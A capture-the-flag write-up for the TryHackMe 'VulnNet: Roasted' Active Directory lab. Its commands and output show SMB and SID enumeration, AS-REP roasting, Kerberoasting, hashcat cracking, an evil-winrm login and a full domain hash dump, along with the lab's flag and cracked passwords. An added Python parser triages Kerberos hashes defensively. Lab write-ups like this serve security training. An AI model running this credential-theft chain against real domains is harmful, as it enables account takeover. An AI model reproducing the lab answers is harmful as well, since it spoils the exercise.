THM Easy VulnNet Roasted done
Easy_VulnNet_Roasted
OS:
Windows
Open ports:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-02-02 11:59:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49709/tcp open msrpc Microsoft Windows RPC
Scan: nmap
sudo nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.31.226_nmap_vulns 10.10.31.226
Scan: enum4linux
enum4linux -u "" -p "" -a 10.10.151.58 | tee 10.10.151.58_enum4linux
enum4linux -u "anonymous" -p "anonymous" -a 10.10.151.58 | tee 10.10.151.58_enum4linux_anonymous
=================================( Share Enumeration on 10.10.151.58 )=================================
do_connect: Connection to 10.10.151.58 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
VulnNet-Business-Anonymous Disk VulnNet Business Sharing
VulnNet-Enterprise-Anonymous Disk VulnNet Enterprise Sharing
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.151.58
//10.10.151.58/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.151.58/C$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_NO_SUCH_FILE listing \*
//10.10.151.58/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//10.10.151.58/NETLOGON Mapping: OK Listing: DENIED Writing: N/A
//10.10.151.58/SYSVOL Mapping: OK Listing: DENIED Writing: N/A
//10.10.151.58/VulnNet-Business-Anonymous Mapping: OK Listing: OK Writing: N/A
//10.10.151.58/VulnNet-Enterprise-Anonymous Mapping: OK Listing: OK Writing: N/A
Download files from: VulnNet-Business-Anonymous #rabbit-hole
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ smbclient \\\\10.10.151.58\\VulnNet-Business-Anonymous
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 12 21:46:40 2021
.. D 0 Fri Mar 12 21:46:40 2021
Business-Manager.txt A 758 Thu Mar 11 20:24:34 2021
Business-Sections.txt A 654 Thu Mar 11 20:24:34 2021
Business-Tracking.txt A 471 Thu Mar 11 20:24:34 2021
8540159 blocks of size 4096. 4296518 blocks available
smb: \> get Business-Manager.txt
getting file \Business-Manager.txt of size 758 as Business-Manager.txt (1.5 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \> get Business-Sections.txt
getting file \Business-Sections.txt of size 654 as Business-Sections.txt (1.1 KiloBytes/sec) (average 1.3 KiloBytes/sec)
smb: \> get Business-Tracking.txt
getting file \Business-Tracking.txt of size 471 as Business-Tracking.txt (1.1 KiloBytes/sec) (average 1.2 KiloBytes/sec)
smb: \> exit
Download files from: VulnNet-Enterprise-Anonymous #rabbit-hole
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ smbclient \\\\10.10.151.58\\VulnNet-Enterprise-Anonymous
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Mar 12 21:46:40 2021
.. D 0 Fri Mar 12 21:46:40 2021
Enterprise-Operations.txt A 467 Thu Mar 11 20:24:34 2021
Enterprise-Safety.txt A 503 Thu Mar 11 20:24:34 2021
Enterprise-Sync.txt A 496 Thu Mar 11 20:24:34 2021
8771839 blocks of size 4096. 4525549 blocks available
smb: \> get Enterprise-Operations.txt
getting file \Enterprise-Operations.txt of size 467 as Enterprise-Operations.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> get Enterprise-Safety.txt
getting file \Enterprise-Safety.txt of size 503 as Enterprise-Safety.txt (0.8 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> get Enterprise-Sync.txt
getting file \Enterprise-Sync.txt of size 496 as Enterprise-Sync.txt (0.8 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit
Enumerate usernames - Impacket (lookupsid.py)
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ python3 /home/kali/.local/bin/lookupsid.py [email protected] | tee 10.10.151.58_lookupsid
Password:
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.151.58
[*] StringBinding ncacn_np:10.10.151.58[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)
Enumerate usernames - list of users
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ cat 10.10.151.58_lookupsid | awk -F"\\" '{print $NF}' | awk '{print $1}' | sort | uniq | grep -v "]" | tee 10.10.151.58_lookupsid_only_users
Administrator
Allowed
a-whitehat
Cert
Cloneable
Denied
DnsAdmins
DnsUpdateProxy
Domain
Enterprise
enterprise-core-vn
Group
Guest
Impacket
j-goldenhand
j-leet
Key
krbtgt
Protected
RAS
Read-only
Schema
t-skid
WIN-2BO8M1OE1M1$
Get all hashes from domain - ASREPRoast
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ python3 /home/kali/.local/bin/GetNPUsers.py 'VULNNET-RST/' -usersfile 10.10.151.58_lookupsid_only_users -no-pass -dc-ip 10.10.151.58
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] invalid principal syntax
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$t-skid@VULNNET-RST:7bee1d639214d8e7bf2638465bca4302$0df296420cf5e457af1d3e7f23f5ca8f04b5ce1e1971526e505b2b701b27e4e35b2447d9d73d8b68f58fecdabf4d0d69a7faef69f8b4cb7ee1955e496d17c451e91d7340bf73447b9e6378d6a09bdf728e068a936756cde5fc9b72928b007f9979f96917ecbc2e54dd124d420704494ca603deacb72017af03f96e1d2894a321b4ad85e5d9ea55474d8e965eba5526f65c88460fb1d2d29f467a7854a10fe84fd1dd6473311c0db10f3d00beacbf41b1981b383b904e74bdb6348bfdf1aafe9d3e7e47a19d445b25576606121a4bd6a7f6a3620d873e169ceaa953c5293f5093e80947f2ac5ee730521187a1b27843c5
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Hash for user: t-skid
$krb5asrep$23$t-skid@VULNNET-RST:7bee1d639214d8e7bf2638465bca4302$0df296420cf5e457af1d3e7f23f5ca8f04b5ce1e1971526e505b2b701b27e4e35b2447d9d73d8b68f58fecdabf4d0d69a7faef69f8b4cb7ee1955e496d17c451e91d7340bf73447b9e6378d6a09bdf728e068a936756cde5fc9b72928b007f9979f96917ecbc2e54dd124d420704494ca603deacb72017af03f96e1d2894a321b4ad85e5d9ea55474d8e965eba5526f65c88460fb1d2d29f467a7854a10fe84fd1dd6473311c0db10f3d00beacbf41b1981b383b904e74bdb6348bfdf1aafe9d3e7e47a19d445b25576606121a4bd6a7f6a3620d873e169ceaa953c5293f5093e80947f2ac5ee730521187a1b27843c5
Cracking hash for user: t-skid
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ hashcat -m 18200 -a 0 t-skid_hash.txt /tmp/rockyou.txt -o 10.10.151.58_hash_cracked
...
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$t-skid@VULNNET-RST:7bee1d639214d8e7bf...7843c5
Time.Started.....: Thu Feb 2 16:13:59 2023 (3 secs)
Time.Estimated...: Thu Feb 2 16:14:02 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/tmp/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1306.5 kH/s (0.93ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3178496/14344385 (22.16%)
Rejected.........: 0/3178496 (0.00%)
Restore.Point....: 3176448/14344385 (22.14%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: tjh10793 -> tj030499
Hardware.Mon.#1..: Util: 64%
Started: Thu Feb 2 16:13:35 2023
Stopped: Thu Feb 2 16:14:03 2023
Cracked hash for user: t-skid
tj072889*
Kerberoasting
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ python3 /home/kali/.local/bin/GetUserSPNs.py 'VULNNET-RST.local/t-skid:tj072889*' -output 10.10.186.74_keberoast.hash -dc-ip 10.10.186.74
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- ------------------ ------------------------------------------------------------- -------------------------- -------------------------- ----------
CIFS/vulnnet-rst.local enterprise-core-vn CN=Remote Management Users,CN=Builtin,DC=vulnnet-rst,DC=local 2021-03-11 14:45:09.913979 2021-03-13 18:41:17.987528
Identifying the hash
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ name-that-hash -f 10.10.186.74_keberoast.hash | tee 10.10.186.74_keberoast.hash.Identifying
Most Likely
Kerberos 5 TGS-REP etype 23, HC: 13100 JtR: krb5tgs Summary: Used in Windows Active Directory.
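Both hashes in this write-up, the `$krb5asrep$23$...` AS-REP for t-skid and the `$krb5tgs$23$*...` TGS-REP for enterprise-core-vn, carry the encryption type (23 = RC4-HMAC), the account and, for the TGS, the SPN in their header fields, which is all name-that-hash needs to label them. Added example, not from the original write-up: a Python parser for the two hashcat-format hashes that extracts those fields, tolerates the line wrapping seen above, and reports the account-level weakness each one implies; the header fields of the samples mirror the page, the hex blobs are shortened constructed placeholders.

```python
import re

# Constructed samples: header fields mirror the two hashes in this write-up,
# the checksum/edata hex is shortened placeholder data, not real ticket material.
ASREP_SAMPLE = ("$krb5asrep$23$t-skid@VULNNET-RST:"
                "7bee1d639214d8e7bf2638465bca4302$0df296420cf5e457af1d3e7f23f5ca8f")
TGS_SAMPLE = ("$krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$"
              "VULNNET-RST.local/enterprise-core-vn*$"
              "a3b7a9fdb5de20b04b4fabb320fb3809$1c3d4fa40ab3b480ebc88564fbaf0dc3")
# Tools and pastes often wrap the hex across lines, as the TGS hash above was.
TGS_WRAPPED = TGS_SAMPLE[:70] + "\n" + TGS_SAMPLE[70:110] + "\n" + TGS_SAMPLE[110:]

# hashcat 18200 layout: $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<edata>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(\d+)\$([^@$]+)@([^:$]+):([0-9a-f]{32})\$([0-9a-f]+)$")
# hashcat 13100 layout: $krb5tgs$<etype>$*<user>$<REALM>$<spn>*$<checksum>$<edata>
TGS_RE = re.compile(
    r"^\$krb5tgs\$(\d+)\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-f]{32})\$([0-9a-f]+)$")

ETYPE_NAMES = {23: "rc4-hmac", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}
# Only the two modes used in this write-up are mapped; other etypes stay unmapped.
HASHCAT_MODES = {("asrep", 23): 18200, ("tgs", 23): 13100}


def parse_kerberos_hash(raw):
    """Split a hashcat-format AS-REP or TGS-REP hash into its header fields."""
    h = "".join(raw.split())          # undo line wrapping and stray whitespace
    m = ASREP_RE.match(h)
    if m:
        etype, user, realm, checksum, edata = m.groups()
        return {"kind": "asrep", "etype": int(etype), "user": user, "realm": realm,
                "spn": None, "checksum": checksum, "edata_len": len(edata) // 2}
    m = TGS_RE.match(h)
    if m:
        etype, user, realm, spn, checksum, edata = m.groups()
        return {"kind": "tgs", "etype": int(etype), "user": user, "realm": realm,
                "spn": spn, "checksum": checksum, "edata_len": len(edata) // 2}
    raise ValueError("not a hashcat-format $krb5asrep$/$krb5tgs$ hash")


def triage(raw):
    """What a captured or reported hash tells a defender: which account,
    which misconfiguration produced it, and the setting to fix."""
    info = parse_kerberos_hash(raw)
    info["etype_name"] = ETYPE_NAMES.get(info["etype"], "unknown")
    info["hashcat_mode"] = HASHCAT_MODES.get((info["kind"], info["etype"]))
    info["rc4"] = info["etype"] == 23   # RC4 ticket material cracks fastest offline
    if info["kind"] == "asrep":
        info["cause"] = "DONT_REQUIRE_PREAUTH is set on the account"
        info["fix"] = ("clear 'Do not require Kerberos preauthentication' on "
                       + info["user"])
    else:
        info["cause"] = ("user account %s holds SPN %s, so any authenticated domain "
                         "user can request a service ticket for it"
                         % (info["user"], info["spn"]))
        info["fix"] = ("move the SPN to a gMSA or set a long random password, "
                       "and restrict the account to AES encryption types")
    return info


if __name__ == "__main__":
    for sample in (ASREP_SAMPLE, TGS_WRAPPED):
        t = triage(sample)
        print(t["kind"], t["user"], t["etype_name"], t["hashcat_mode"], "->", t["fix"])
```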
Cracking Kerberos hash
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ hashcat -m 13100 10.10.186.74_keberoast.hash /tmp/rockyou.txt -o 10.10.186.74_keberoast.hash_cracked
hashcat (v6.2.6) starting
...
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*enterprise-core-vn$VULNNET-RST.LOCAL$V...35a0d9
Time.Started.....: Thu Feb 2 17:35:22 2023 (4 secs)
Time.Estimated...: Thu Feb 2 17:35:26 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/tmp/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1011.8 kH/s (1.06ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4110336/14344385 (28.65%)
Rejected.........: 0/4110336 (0.00%)
Restore.Point....: 4108288/14344385 (28.64%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ry=iu0if] -> rvy15rv
Hardware.Mon.#1..: Util: 55%
...
Cracked Kerberos hash
ry=ibfkfv,s6h,
Login to Windows
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ evil-winrm -u 'enterprise-core-vn' -p 'ry=ibfkfv,s6h,' -i 10.10.50.215
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents> whoami
vulnnet-rst\enterprise-core-vn
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Documents>
Read flag: user.txt
*Evil-WinRM* PS C:\> ls -l Users/enterprise-core-vn
Directory: C:\Users\enterprise-core-vn
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 3/13/2021 3:43 PM Desktop
d-r--- 3/13/2021 3:42 PM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
*Evil-WinRM* PS C:\> ls -l Users/enterprise-core-vn/Desktop/
Directory: C:\Users\enterprise-core-vn\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/13/2021 3:43 PM 39 user.txt
*Evil-WinRM* PS C:\> cat Users/enterprise-core-vn/Desktop/user.txt
THM{726b7c0baaac1455d05c827b5561f4ed}
*Evil-WinRM* PS C:\>
Flag: user.txt
THM{726b7c0baaac1455d05c827b5561f4ed}
Open SYSVOL share
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ smbclient //10.10.128.12/SYSVOL --user=enterprise-core-vn%ry=ibfkfv,s6h,
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 11 14:19:49 2021
.. D 0 Thu Mar 11 14:19:49 2021
vulnnet-rst.local Dr 0 Thu Mar 11 14:19:49 2021
8771839 blocks of size 4096. 4530213 blocks available
smb: \> cd vulnnet-rst.local\scripts\
smb: \vulnnet-rst.local\scripts\> dir
. D 0 Tue Mar 16 19:15:49 2021
.. D 0 Tue Mar 16 19:15:49 2021
ResetPassword.vbs A 2821 Tue Mar 16 19:18:14 2021
8771839 blocks of size 4096. 4530186 blocks available
smb: \vulnnet-rst.local\scripts\> get ResetPassword.vbs
getting file \vulnnet-rst.local\scripts\ResetPassword.vbs of size 2821 as ResetPassword.vbs (2.5 KiloBytes/sec) (average 2.5 KiloBytes/sec)
Read file: ResetPassword.vbs
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ cat ResetPassword.vbs | grep -C1 -i StrPassword
Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName
--
strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"
...
Credentials: a-whitehat
User: a-whitehat
Password: bNdKVkjv3RR9ht
Dump hashes from domain
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/THM_VulnNet:_Roasted]
└─$ python3 /home/kali/.local/bin/secretsdump.py VULNNET-RST.local/a-whitehat:bNdKVkjv3RR9ht@10.10.128.12 | tee 10.10.128.12_hash_dump_domain
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
VULNNET-RST\WIN-2BO8M1OE1M1$:aes256-cts-hmac-sha1-96:16631cfbb039f6902ec0d2f5c07e12b651e317e2a22fe60dc944b98e9c0c2ccf
VULNNET-RST\WIN-2BO8M1OE1M1$:aes128-cts-hmac-sha1-96:87927b2928b58fca8dba7cc08e7dd0d1
VULNNET-RST\WIN-2BO8M1OE1M1$:des-cbc-md5:2c864301e93d8567
VULNNET-RST\WIN-2BO8M1OE1M1$:plain_password_hex:fb01bd39cc426470903994d2a6e5a2980adad499ab4a00a1cdda158a63ce54a8979fdf2155d305413b02d0e1647c2e4dadcba31b0d8048dbf9d13964d517d4ddd86d37e6b8767120a95b6d760291c0bc9e26168184fe2eadcd047b592e8599b8bc526c8b6614050caffe72d2cf659e13fb58fa7264a9c4bbd80add8764c40d41162f47b8a28cb8e4bc8a3334fca309baf9b7fdbb37af00ddf92dda6087193c404f9fc05672ff76c0c2ad118f8cf89679870ee9f2485b9bdae1583931e9570286b2493c172dfb5be7d30246a5a4514f96e521440f1dff8f11a655ac0b00c77b031310ec380b8c31ad5ae4fe668f4d2099
VULNNET-RST\WIN-2BO8M1OE1M1$:aad3b435b51404eeaad3b435b51404ee:de2f972856959531d5b02915e8b8fd73:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x20809b3917494a0d3d5de6d6680c00dd718b1419
dpapi_userkey:0xbf8cce326ad7bdbb9bbd717c970b7400696d3855
[*] NL$KM
0000 F3 F6 6B 8D 1E 2A F4 8E 85 F6 7A 46 D1 25 A0 D3 ..k..*....zF.%..
0010 EA F4 90 7D 2D CB A5 8C 88 C5 68 4C 1E D3 67 3B ...}-.....hL..g;
0020 DB 31 D9 91 C9 BB 6A 57 EA 18 2C 90 D3 06 F8 31 .1....jW..,....1
0030 7C 8C 31 96 5E 53 5B 85 60 B4 D5 6B 47 61 85 4A |.1.^S[.`..kGa.J
NL$KM:f3f66b8d1e2af48e85f67a46d125a0d3eaf4907d2dcba58c88c5684c1ed3673bdb31d991c9bb6a57ea182c90d306f8317c8c31965e535b8560b4d56b4761854a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7633f01273fc92450b429d6067d1ca32:::
vulnnet-rst.local\enterprise-core-vn:1104:aad3b435b51404eeaad3b435b51404ee:8752ed9e26e6823754dce673de76ddaf:::
vulnnet-rst.local\a-whitehat:1105:aad3b435b51404eeaad3b435b51404ee:1bd408897141aa076d62e9bfc1a5956b:::
vulnnet-rst.local\t-skid:1109:aad3b435b51404eeaad3b435b51404ee:49840e8a32937578f8c55fdca55ac60b:::
vulnnet-rst.local\j-goldenhand:1110:aad3b435b51404eeaad3b435b51404ee:1b1565ec2b57b756b912b5dc36bc272a:::
vulnnet-rst.local\j-leet:1111:aad3b435b51404eeaad3b435b51404ee:605e5542d42ea181adeca1471027e022:::
WIN-2BO8M1OE1M1$:1000:aad3b435b51404eeaad3b435b51404ee:de2f972856959531d5b02915e8b8fd73:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:7f9adcf2cb65ebb5babde6ec63e0c8165a982195415d81376d1f4ae45072ab83
Administrator:aes128-cts-hmac-sha1-96:d9d0cc6b879ca5b7cfa7633ffc81b849
Administrator:des-cbc-md5:52d325cb2acd8fc1
krbtgt:aes256-cts-hmac-sha1-96:a27160e8a53b1b151fa34f45524a07eb9899ebdf0051b20d677f0c3b518885bd
krbtgt:aes128-cts-hmac-sha1-96:75c22aac8f2b729a3a5acacec729e353
krbtgt:des-cbc-md5:1357f2e9d3bc0bd3
vulnnet-rst.local\enterprise-core-vn:aes256-cts-hmac-sha1-96:9da9e2e1e8b5093fb17b9a4492653ceab4d57a451bd41de36b7f6e06e91e98f3
vulnnet-rst.local\enterprise-core-vn:aes128-cts-hmac-sha1-96:47ca3e5209bc0a75b5622d20c4c81d46
vulnnet-rst.local\enterprise-core-vn:des-cbc-md5:200e0102ce868016
vulnnet-rst.local\a-whitehat:aes256-cts-hmac-sha1-96:f0858a267acc0a7170e8ee9a57168a0e1439dc0faf6bc0858a57687a504e4e4c
vulnnet-rst.local\a-whitehat:aes128-cts-hmac-sha1-96:3fafd145cdf36acaf1c0e3ca1d1c5c8d
vulnnet-rst.local\a-whitehat:des-cbc-md5:028032c2a8043ddf
vulnnet-rst.local\t-skid:aes256-cts-hmac-sha1-96:a7d2006d21285baee8e46454649f3bd4a1790c7f4be7dd0ce72360dc6c962032
vulnnet-rst.local\t-skid:aes128-cts-hmac-sha1-96:8bdfe91cca8b16d1b3b3fb6c02565d16
vulnnet-rst.local\t-skid:des-cbc-md5:25c2739dcb646bfd
vulnnet-rst.local\j-goldenhand:aes256-cts-hmac-sha1-96:fc08aeb44404f23ff98ebc3aba97242155060928425ec583a7f128a218e4c5ad
vulnnet-rst.local\j-goldenhand:aes128-cts-hmac-sha1-96:7d218a77c73d2ea643779ac9b125230a
vulnnet-rst.local\j-goldenhand:des-cbc-md5:c4e65d49feb63180
vulnnet-rst.local\j-leet:aes256-cts-hmac-sha1-96:1327c55f2fa5e4855d990962d24986b63921bd8a10c02e862653a0ac44319c62
vulnnet-rst.local\j-leet:aes128-cts-hmac-sha1-96:f5d92fe6dc0f8e823f229fab824c1aa9
vulnnet-rst.local\j-leet:des-cbc-md5:0815580254a49854
